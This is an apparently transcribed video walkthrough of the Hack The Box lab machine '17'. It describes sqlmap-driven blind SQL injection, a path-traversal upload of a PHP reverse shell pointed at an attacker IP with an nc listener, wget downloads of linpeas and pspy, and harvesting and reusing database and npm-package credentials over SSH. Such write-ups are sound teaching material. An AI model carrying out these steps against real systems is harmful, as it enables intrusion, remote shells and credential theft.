Welcome back guys, hope you all are doing well. This is Mohammad Badrudduja and today we are going to solve another machine from Hackthebox. The machine name is 17 and the difficulty level of this machine is hard. So without wasting time, let's go and we will start the machine with Nmap. So Nmap space hyphen S capital V for version enumeration, space hyphen S capital C for default scripts, and the target IP is 10.10.11.165. And I want to save this scan result in a file named as default.nmap. So I already ran the scan to save the time, so I just want to show you the scan result with default.nmap. So here 3 ports are open. Port number 22 TCP port state is open and default for SSH. The version is OpenSSH 7.6 P1 Ubuntu. Second port is port number 80. This is default for HTTP, and as you can see, the state of this port is open and the service it's using is Apache HTTPD 2.4.29. Third port is port 8000 and this is HTTP. The service running same Apache HTTPD 2.4.38. Although there is a difference in versions, so we will see that. Fine, so I already created a record in etc host file with the name 17.htb, and so that I can access this port 80, and there is one web application running which is 17. Although if we go to see some links, so index.html, courses and everything, and every link here seems like dead link. So if I even click login, it puts a pound sign here. Here are some blogs and events, but everything is dead link wherever you go. So if I go course, blog, everywhere, help desk, blog, privacy, every link is dead link. This API seems interesting, but if I hover cursor on it, and you can see it is again a dead link. So let's go and we will try to access port number 8000. So 17.htb and port number 8000, hit enter, and there is forbidden. So what we do here is, it's always better to run some enumeration process in the backend. So the first thing I'm going to do is using GoBuster for the directory enumeration. So GoBuster directory enumeration space hyphen Z hyphen W for word list, user share word list, and I'm gonna use seclist, discovery, web contents, and I want to use raft medium directories, and directories I want to use lowercase, then space hyphen u for the URL, and the URL is going to be http://17.htb / space hyphen t, number of threads I want to choose 60. Fine, hit enter, and again I'm gonna open another terminal here, and the same thing I want to use here, paste that, and just I want to change something like 8000, right? Rest of the things are okay. Hit enter, we got bunch of directories, and I'm going to open another tab here, and here I'm going to enumerate for the subdomains, and that I'm going to do with fuf. So fuf space hyphen w for the word list, and word list I'm going to use user share word list, seclist, discovery, DNS, and subdomain, and URL is going to be http://17.htb, and then I want to add a header space hyphen h, and here I'm going to write host colon, let's say fuzz dot 17.htb. Fine, and number of threads I want to use, let's say 60. Hit enter. As we hit enter, everything is 200, but we can filter this result with filtering words or filtering size. So I'm going with filtering word, which is 2760. So clear that. Rest of the things are okay. Just I want to add FW for the filtering word, 2760, and come back here. Let's see, go to the page source, and before going to page source, actually I forget a very important part. What web? http://17.htb and hit enter. So this will actually give you some information about the server running on it, on which platform this application built. So these are the information you are going to see here, and as you can see here, it's running on Apache 2.4.29, country reserved HTML5, Ubuntu Linux. This is the IP address. jQuery, it's using jQuery. Open Graph Protocol, let's begin your education with us. Okay, so not much, but still. Come back here, and we got one subdomain, and the subdomain is exam. So I already created that record also. So I'm going to open here a new tab, and here I'm going to access exam.17.htb. Okay, so this is another web application which is examination management system, and if you scroll down you will see here copyright examination management system 2021. So you can also search public exploits on it, like examination management system. Copy that, come here and just paste that, hit enter. So let's go back to the terminal and let it run completely. Come back here, and here you can see on port number 8000 it's something is running, but we did not get any directory here. So I want to clear this, and instead of that I'm going to make directory enumeration on exam.17.htb. so exam dot, it's exam or exams, exam, yeah, fine, just hit enter. Let's see, and there are many directories, images. So I wanna take this result. Now let's go and explore a bit this one. So first of all I'm going to see the page source. So view page source, and I again wanna run what web on it. So clear this one, and let's say what web http://exam.17.htb, hit enter. Maybe we have something here, and yeah, a bit information more than that. So here you can see the rest of the things approximately same, but here you found the application built on PHP 2.7.2.34. so that is interesting. Also it's running on Apache 2.4.29, but this one exam.17.htb, this subdomain is running on Apache 2.4.38. so this is the difference on it. You can again search the vulnerability by combining these two results, so maybe you get some vulnerability, but here it's not. So back again on the page source of this 17 examination subdomain. So if I click on exams, so we got one parameter which is p, and its value is exam. We tried a bunch of things here like LFI, RFI, and SQLI. So if we go to exam, this page, and view page source of this page, and go down here to see the search function here, and there you go, there is a search function. So in this search function you will find one new endpoint, which is view underscore exam.php with id, with parameter id, right? So let's go and see what we have here. I'm going to copy this, come back to the exam subdomain, and instead of that I'm gonna paste view exam.php and id is equal to, let's say, 1, and hit enter. So once we hit enter, we found an exam, but there is one link which is take exam. So once we click on take exam, we come here, fine, and as you can see there is again a parameter id and its value is 1. So we can try a bunch of things here again, like similarly, order by first thing first. Let's see with this, and there is nothing, unknown exam id, fine, and it's redirected us to the same page. So now again, if I say hit enter, and yeah, that's perfect. So now we can put our SQL syntaxes here in between this single quote and dashes. So now if I say order by 1, hit enter, and there is nothing, we can say and hit enter, and yeah, so send this request to the repeater again, go to the repeater, send this request, and as you can see the length is 7824 bytes. So what I am going to do here now, because once we put here and, it gives us something which is not there, means not correct. So maybe if I say like this, and instead of a space I'm gonna say plus 1 is equal to 1, and this is the correct statement, right? So here also I'm gonna say plus. So this is the correct statement, so we should get the correct result. Send this request again, and this time you can see there are 20,683 bytes, and this response is the correct response. Boolean SQL injection, where the condition, once the condition is true, we got the response, correct response, and if the condition is not true, like if I say here 2 and send this request, you can see there are 7824 bytes again, and in the response you got nothing, not much like before, because it's redirecting us. So if I say 1 is equal to 1, this gives us exact match. So now we can test one more thing, like if I say here sleep, let's say 5 seconds. So now you can see the response time is 170 milliseconds, but we here add 5 seconds more. So if it's blind SQL type, it is going to take 5 seconds, which is not. So maybe we here must have to put and, because this is Boolean type, and yeah, that's working. That means there is SQL injection, and there are two type of SQL injection vulnerabilities here. The first one is Boolean type, where the condition is going to be either true or false, and the second one is time delay. So as you can see here, 5178 milliseconds. If I increase this time to 10, it is going to take the actual response time, and it is going to add 10 seconds on it. So that's perfect. Now what we are going to do here, we are going to pass this to the SQL map, because it's gonna take too much time to enumerate the database manually. So come back here and come here, just clear that. Now SQL map space -u, and the URL is going to be this. So copy that, come here, paste that, and I want to say parameter is going to be ID, because ID parameter is vulnerable for SQLi. The second thing, the payload we used, or the syntax or query we use for testing the SQLi is for MySQL. So now we know that --dbms is equal to MySQL. Now the third thing I want to know, current, current DB means current database. What is the current database? And third thing, let's say put the label 3, and let's say --risk is equal to 2, and to automate the process, because SQL map is going to ask you many questions. So to automate or to choose the best answers automatically, I'm gonna choose batch. And to speed up the process, because we already know that there are two kind of SQL injection vulnerabilities here in this application. One is Boolean based, and second one is time based. So in that case, maybe the SQL map is going to take too much time. So to increase the process strength, we are going to use thread equal to, let's say, 6. So as you can see, the current database is ERMS database. Fine. So now let's try all the databases in the server. So for that, I'm gonna say --schema. So you know there is information schema, right? So here we just put schema and hit enter. So it is going to test whatever databases are there. So you can see here there are 4 databases, right? And see, we choose here number of threads 6. That's why it is very fast, right? Otherwise it is going to take too much time to just complete the database name information schema. The second database is DBSFMS, and third database. Why? Because it is going to check each character one by one. So first character is A or not. If A, it is going to put A, then it will check the second character. So second character is A. If not A, it will check B, C, D, and then even numbers from 1 to 0 to 9, then all the characters. So that is the thing. So now as you can see here, we found here 4 databases. First database name is information schema, second is DB SFMS, third one is ERMS, and the fourth one is round cube DB. And then it is going to see the tables in each of these databases. So these are the tables, and still you see how fast it is. So if I put thread value 10, maybe it is going to give us more quick results. So now we have, it is going to take too much time, so we will focus on these 3. So let's go, and first we will check this one. So clear that. Within this query, just we need to change few things like Now we know the database is space -d, and the database name is db_sfms, and let's enumerate the tables. Fine, and hit enter. So there are 3 tables. I'm going to copy that, come back here, put that. Okay, now here all these tables are interesting for me, especially users and students. Maybe we will get the credential here. So clear, I'm going to dump this whole database. So -- just say here dump. So it is going to dump all the tables, all the columns, all the information. And even if it got the MD5 hash password, it is going to try to crack it. So it's trying to crack. Let's see, it will take just 2-3 minutes. Till then, what we can do here, I'm going to pause the video. Now it's done. So these are the students. Okay, let it work. I'm going back here. The most interesting thing here is if I go to admin, so admin login is disabled, so we cannot log in. This portal is disabled. So let's see, and there you go, everything is done. So there are 3 tables. The first table is student. I'm going to copy that, come back here and just paste that, paste it. Now go back. The second table is for users, and we are going to copy it again and paste it here. The third table is storage. So in storage, now we know that there is marksheet-finals.pdf file is there. We will see that in a minute. Okay, so these tables we have. Now we dump this first database. Let's go and dump the second database, which is erms_db. So clear that, and here we just need to say erms_db, and instead of dump, I'm just gonna say, let's see how many tables are there. If there is a table which is not interesting, so we will leave that table. And as you can see, there are 6 tables. So I'm gonna copy that and paste it here. Go back. So category list, exam list, option, question, system info. So I'm interested in system info and users. So clear that, system_info and users. Now let's say just see tables, and what tables we want, users and -- dump. Now it will dump the table. So there are again some users are there with the hashes. Fine. So let it complete, and till then what we can do, we already have some hashes from the students, right? So let's go and try to crack it with crack station. Paste that. I'm not robot, of course. Didn't work. Let's try this one. Copy, and what? Oh, so this is already cracked by the SQL map. Yeah, I didn't see that just now, because as I mentioned that this SQL map also try to crack if it's find MD5 hash. So we already have it. Let's just try this one. maybe it has something, but SQL map did not have the correct value, so there is nothing. Let's test this if it will work or not. Paste that. Really? Next. Come on. Traffic lights. Verify. Okay, crack it. And yeah, auto distraction and auto distraction. Yeah, so we have a valid student here, which is this Shen Kelly. That's it. Perfect. Now go back to the SQL map, and here we have few tables from the beginning. So this is the users table. Okay, this is the users table, so I'm going to copy it and come back to here. Paste that. View, let's say 12. Okay. The next table in which I'm interested was system info, right? So instead of user, system underscore info, hit enter, and this is the system information. So I'm gonna take this table too, because here I can see few file names. So paste that. Okay, now round cube is there, so I'm gonna clear it. What is the name of the database? roundcubedb. Paste that here. Space hyphen tables. So first of all, I want to enumerate the tables. What are the tables there? And there are a lot of tables, but I'm interested in users. So I already actually put here dump, so it's dumping all the tables. So let it run, let it dump, and we are going to see the results what we got up to now. The important part here, in the ERMS database we found users table, and inside users table we found this endpoint with the file. And here if we go back to the exam domain, here we did not found anything where I can log in, because we got some credentials. Even this admin portal is disabled, but we found here an endpoint which is old management. So I just copy this old management directory and try to put first of all here with the '17, and there is nothing found. Paste old management, http:// and hit enter. Old management. Let's try it with admin. Admin/old management, and there is nothing. But one thing we missed here. What we missed here, in the beginning we saw that http:// 17.htb, there is something running on port number 8000, but we don't get anything. So old management, hit enter, and there we got the old this is maybe the old management's web application for the students. So now we have a student number and password here. If we go up, so this is the student number, because we got password for this only. So 31234, 31234, and the password is auto destruction. Copy and paste that here. Hit enter and we logged in. Cool. Now we saw this file right in the dump database. Where is it? This one, marksheet final.pdf. So all these things coming from database. Let's just download this marksheet finals.pdf and we will see what's inside it. So it's downloaded and it's open here. Okay, so this is the mark sheet for this user, Kelly user, whatever the point is, but there is a message. So okay, here we found one subdomain. So I'm going to copy this and I'm going to paste it with me. So paste it here. Okay. Let's see what's running on it. Paste that, hit enter. HTTPS, we did not get anything running on HTTPS. Try on HTTP, maybe it's on HTTP. Let's first check whether we created in our etc host file or not. Clear nano grep paste /etc/host, and it should be without this. No, it's not there. We can create it. So I'm gonna pause the video, create it, and we'll come back. So now we have this subdomain in our etc host file. Now try to access this again, and there is roundcube email server is there. We have this school management system. So in this school management system, if you see closely, you will find here file upload functionality, which is interesting to me, and I want to actually capture this. So I'm gonna control A here and just clear this history. Now enable burp suite in the browser and just manage this a bit. Okay, so come down here. Let's choose an image, which is this, and upload this image, add this file, and we have here the post request and a get request. And here we can see the file is uploaded successfully, but there is something. No, it's also here. So this is the file name. So the first interesting part is whatever file you are going to upload, it is uploading with the same name. Sometimes application actually once you upload the file is uploaded successfully, but in the server that file saved with some another name, some random name with the date and epoch time, and sometime even in the seconds and milliseconds, and it combined the file name with that. So but here the file name is same. Okay, these are coming from master mailer. Okay, we will see that in a minute, but these two, come on, turn off, and here delete the selected items. Okay, I just want to say what I want to say. So the first, once we upload, the first request is post request, and if we come here and see this request closely, so this is the file name here, name is equal to file image jpg. In the last, go to the last, and here you can see there is a student number, and this is our logged in student number. Fine. Now we got this file, but where this file actually goes, we need to see that. So in the database, again, if we go, we see that the files, avatar files, are there inside the files directory in the old management. And if we come here, we can see these files should also go to there in the file. So I'm going to just delete that, and let's say files, hit enter, and forbidden. That means we cannot access this directory, and whatever files inside this directory we cannot access like this. We can download, but we cannot access those files. So if we upload the PHP reverse shell file, we need to actually execute that file from the browser, from the URL. And once we download, so it is going to download this file completely instead of processing that file. Let's try 123.jpg, forbidden, not found. It's file or files, file. Okay, we can trick the server. So let's go and upload the file again. Start the intercept on and upload the file. So 123, add the file. Here we get the request. Just change the name 12333 2 times, and go in the last and just change this directory like this. Forward this request, and here you go. So now, as you can see, here you have an error while saving the file. Fine, but what we put there is a student name. We put there like this. We put there a student number, which is 31234 / ... So it will go one directory back. Come back here. If I say 31234, hit enter. Don't need that. Okay, not found, because we must put here first files, hit enter. Same as before, the files, in the files we have no permission. 31234 / ... hit enter is still forbidden. If I say 12333.jpg, hit enter. Come on. 31234 we already have here. 12333.jpg, and it should be http:// hit enter. There is nothing, so let's try now. Delete that and hit enter, and as you can see, we are successfully uploaded, and now we can successfully see the file in the browser. So now if we upload PHP reverse shell file or web shell file, we can execute that PHP code here, right? So go back. What was the student ID? 31234, and the password was auto destruction. Don't save. Now what we need to do here is okay, come back here, clear that, and clear this also. Copy /user share web shells, PHP, and PHP reverse shell to here. I'm going to copy this file. This is PHP reverse shell file to the current working directory. If I say ls, so PHP reverse shell is here. I'm going to just change the name from PHP reverse shell to just shell rev.php. Fine. Clear that and come here. Just open this file in the mousepad, which is here. So I'm going to remove all these commented lines because sometimes content is limited to upload the file, and here we need to change the IP to the attacker IP. This is my IP 10.10.14.147. so 10.10.14.147, and the port I'm going to use is 4545, and just save that. Close it, come back here, nc space hyphen nlvp 4545. I'm listening on this port, and go back to the browser. Burp proxy is on and intercept is on. Now browse it, HTTP 17 and this one. So just upload it, and here we need to just change this value to one directory back and forward this request. Similar as before, we got this error, but now if we need to access our PHP file, what we need to do here is in the files / again this files, this path I am taking from here. Shell -rev.php and just hit enter. As we hit enter, we should have shell here, and yeah, we have shell here. Clear that also. So we got the user shell. Now we just need to see what user is it. So who am I? And we are www data, which Python. So there is Python. Now to get a good shell, Python space -c single quote import, and importing module pty.spawn and /bin/bash. Okay, now to execute the clear command, we need to export term is equal to xterm and hit enter. So now we can clear it. Okay, so id, these are very basic commands, but very useful. So okay, and that seems a Docker container. I didn't see that. This is Docker container. Host name, yeah, this could be a Docker container. uname space -e, oh sorry, uname space -a. Okay, I want to see how many users are there. So those users can run bin bash in etc passwd. So there are two users, root and mark. I'm going to copy that, come here, paste that with me, save it. So there should be a mark user. Let's go to its home directory, and its home directory is var www clear ls space -la, and there is only HTML, so cd html ls space -la, and there are three files, so three directories, sorry, and all these 3 directories for 3 different applications. So this one for old management application, which is running on port number 8000. This is for EMRS database, employee management system database we found, which belongs to this application. And the third one is Roundcube email server. Fine. So let's see. First we go here, cd employee paste ls space -la, and if we see that, so there are now, because database is there, so I'm looking for any configuration file which contains the database connection strings. Assign.php, maybe there is config.php. I'm looking for config.php if there is, or sometimes the database connection strings are in index.php. So I do not find here index.php, but there is one db. And psubmit reset.php. Let's see. We can try something. I'm gonna say grep space -i small n small r, and I wanna see if there is password string in any of these files. So any file that contains password string, we are going to see it here. Hit enter, and as you can see, any file that contains password string, on which line it contains password string, it is going to tell you. So there is elogin.html on line number 27th, there is password. So these are the, I think, CSS files. I'm not interested in this now. In the CSS file, there is vendor jQuery. No, this one, vendor jQuery. So these are the jQuery files, and there are passwords too. In the db directory, there is ems.sql file, and on line number 70th, we have password string. But this is again not interesting. Go up, style login.css. No, I want PHP files. So these are the queries. This is the HTML form actually. Yeah, here we got. So process / dbh.php. Inside process directory, there is dbh.php file, and in that PHP file on line number 5th, we will get this password. So the first thing is I'm going to copy that and paste it with me. Save it. Now clear all of this. ls space -la. Where is process directory? This is the process directory. So cd process and clear again ls space -la, and there should be dbh, this one. So cat dbh.php, hit enter, and there is the connection string. So I'm going to take this, copy, go back and paste it here, save. So now let's try if the password reuse vulnerability is there. So maybe we can log in with mark user. So there are a bunch of base 64 strings, and still it's running. So I'm going to cancel that. Clear here, and let's say ssh mark at 10.10.11.165, hit enter. This is the password 22 best year of my life. Copy, paste that, hit enter, clear that. Okay, ls space hyphen la, and we have user flag here. So cat users.text, and this is the user flag. Clear. Now let's go. I want to see again, and this time we are inside the actual machine, not in the Docker container. So if I say ID, hostname, who am I? It's not IG, it should be ID. Yeah. So that's been said. Let's go and we will see what we have here in our home directory. Okay, now grep /bin /bash /etc passwd, and there are two users, Kavi and Mark. We are already marked. Clear it, and net state space hyphen tlpn. So net state space hyphen tlpn, hit enter, and there are a bunch of ports. So just copy that. You can also run linpiece. All this information you can get in linpiece in one place. So cd /dev/shm and ls space hyphen la. There is nothing. Let's get the linpiece here, 147. This is my IP /linpiece.sh. Hit enter, and we are also going to put here pspy. So chmod +x linpiece.sh. Now wget http://10.10.14.147/pspy64. Bring that to and chmod +x pspy. Fine, everything is ready. So first of all, I'm going to execute linpiece, and I'm going to pause the video. Once it's finished, I will be back. Welcome back, guys. So our linpiece is done. So we will see what we have here. Okay, all these hidden files are there, and there is npm. So maybe Node.js application is running on this target. We need to figure it out because a lot of files and directories I'm seeing here with npm and node modules. So this is usually once there is Node.js application running on your machine. Okay, so first thing this. Second thing, we have mails here. Again, as you can see, there are GitHub files, user local lib node modules npm CLI login, and there are many ports listening here. We will see these ports. We already have it. So this is again important and interesting part. You can see how many interfaces are there, but the genuine interfaces, those have IP addresses. This is the loopback. This is Ethernet 0, which have the actual IP, and there is Docker container. So I'm gonna clear it, and let's try to see first of all these ports. So, and before these ports, let's see if we can read the email for Kavi, because we have read permission on it. So cat slash var mail, and inside mail there should be Kavi. Hit enter, and we have something here. The mail for Kavi from admin, new staff manager application. Okay, sorry I couldn't reach you sooner. Good job with the design, I love it. I think Mr. Johnson already told you about our new staff management system. Since our old one had some problems, they are hoping maybe we could migrate to a more modern one. For the first phase, he asked us just a simple web UI to store the details of the staff member. All right. I have already done some server side for you, even though I did come across some problems with our private registry. Okay. However, as we agreed, I removed our old logger and add log label instead. This is again interesting part, and you just have to publish it to our registry and test it with the application. So this is the most important part, which I need to copy and put it with me. 6000143110, and this is for SQL 4873. Just close this and close this. Port 4873. So this application is running. Why I choose this link and why this link is interesting for me, because once you go inside this, you will find few things. Like if you go to introduction and what is Verdasio. So Verdasio is a lightweight private npm proxy registry built in Node.js. So now take this information and match it with the email you found and what you found in the linpiece result. So in the linpiece, it's a lot of npm directories we found. So that pointing us maybe some kind of Node.js application running on the target server. And then we found an email which is saying that I did come across some problem with our private registry. So Verdasio is a lightweight private npm proxy registry. So this is also a registry. So now these are the installation instruction, command line tool, setting up Verdasio, okay, using private registry. So if you go with the npm, you will see how you can set the registry there, and you will find here this port 4873, and how you can set up this. This will set the registry for your optional for your operational system user, and you can find it on the file .npm-rc. So you need to create one .npm-rc file within the npm and set this registry value within this. If you go to the features, you can go to the features. There are configuration files, uplinks, and authentication type. But the interesting part is logger. Why logger? Because we see here that they face some problem with the logger. So he removed the old logger and add the log label instead. So instead of logger, they put the log label. Okay, now we need to go back to the system, and here we need to enumerate the system more. Okay, so cd, go to the home directory, ls space -la, and you can see .npm is there. Fine. So next thing is, if we go to ls space -la, slash where we found that, in where, no, not in where, slash opt. So in opt directory there is app directory, cd slash opt app. Inside app you will find node modules, right? And there is one file which is startup.sh, but root is the owner of this file, so you cannot actually write anything here, and you cannot actually write anything there, but you have read and execution permissions on all these. I just wanted to read first of all this file. So cat startup.sh. So once you read this file, you will know there is db log and there is log level. So okay, they put both of these parameters. They need these two arguments. Okay, and it is going to run a loop where it is going to take one value of this variable, okay, of this variable, and then it is going to check for which log is there, and then it is going to execute npm command space -n and ls, and it is going to grep one of these. So if it found, okay, if it is not found, then if it is not found, so it is going to install it, fine, silently, and then it is going to change the ownership in of this whole directory, space -R of this whole directory. And if it's already there, then it's going to say it's already there, then close the loop, and then it is going to see this file, no index.js, and index.js is already here. So now go to see index.js. Let's see what's inside it, and it's running on port 8000. And as you can see, what they mentioned in the message, that he removed old logger and put log level. So if you come here, you can see it's already commented the db logger, means this one is the old logger and this is the new log level which he added. So everything is very good. Now it's going to create one server, and the function is going to be request and response, and a request is going to be write head 200, content type is text HTML, and it is going to read the index.html file with the function error and data. If it got error, so it is going to write 404, it is going to throw 404 error and means is file not found, and otherwise it is going to write the data, fine. Okay, and it is going to then server is going to listen on the port, and the port is 8000, fine, logger.log. So that's it. That means what we need to do here is, so we need to set this. So first of all, I'm going to copy this, and here I'm going to put that right, but here we are not going to do like this. We are going to do it like that, and instead of localhost, you can write localhost also, but put the IP is better. And we are going to copy this string into a file within /.npm /.npmrc. What we need to do here is npm install db logger, this one. So once we install db logger, because db logger was the old logger, which they actually remove by commenting that line. So it should create one node underscore modules directory in the user's home directory, and inside this directory it should have all the files. So let's go. We are going to create first of all this one, registry http, copy that, come here, paste that, and actually here it should be equal to, fine, and it should be in .npm. So here it's a little change, equal to this. Why? Because if you go instead of this, if you go to GitHub, where's the CO? So if you go to the GitHub link of it, a lightweight Node.js private logger. If you go there and if you open this .npm rc, this file, so you will find here the registry value with equal to sign, right? So there is a little difference in between because it's generating with npm command, but here we are writing manually, so it should be like this. Okay, now fine, we have it here. Just come back here, echo npm dot npm rc and hit enter. Now npm install db logger, fine, and just hit enter. As we hit enter, it should create npm node underscore module directory. Actually we are doing something wrong. cd.npm, inside npm we should run it. So npm install db logger, and fine, that's done. We need to be very quick here, and as you can see there is, so cd node.js, inside node.js you will find db logger. Where is it? db logger. So cd db logger ls space -la, and here we have logger.js. so just open this logger.js, and once you open this logger.js you will find here the credentials. So I'm going to copy this, come back here, and fine. So we have this credential, and if the credential reuse is there, we will have the covey. So clear that, and vertical SSH covey at 10.10.11.165, hit enter. Password, just paste selection, hit enter, and we are logged in as covey. So you have an email which is the same email we read before. So ID, who am I, and host name. So this is the first part of this machine. The second part you will see the privilege escalation. So that's it for this video. If you like the content, please like, subscribe, and share. See you in the second part of this machine. Bye.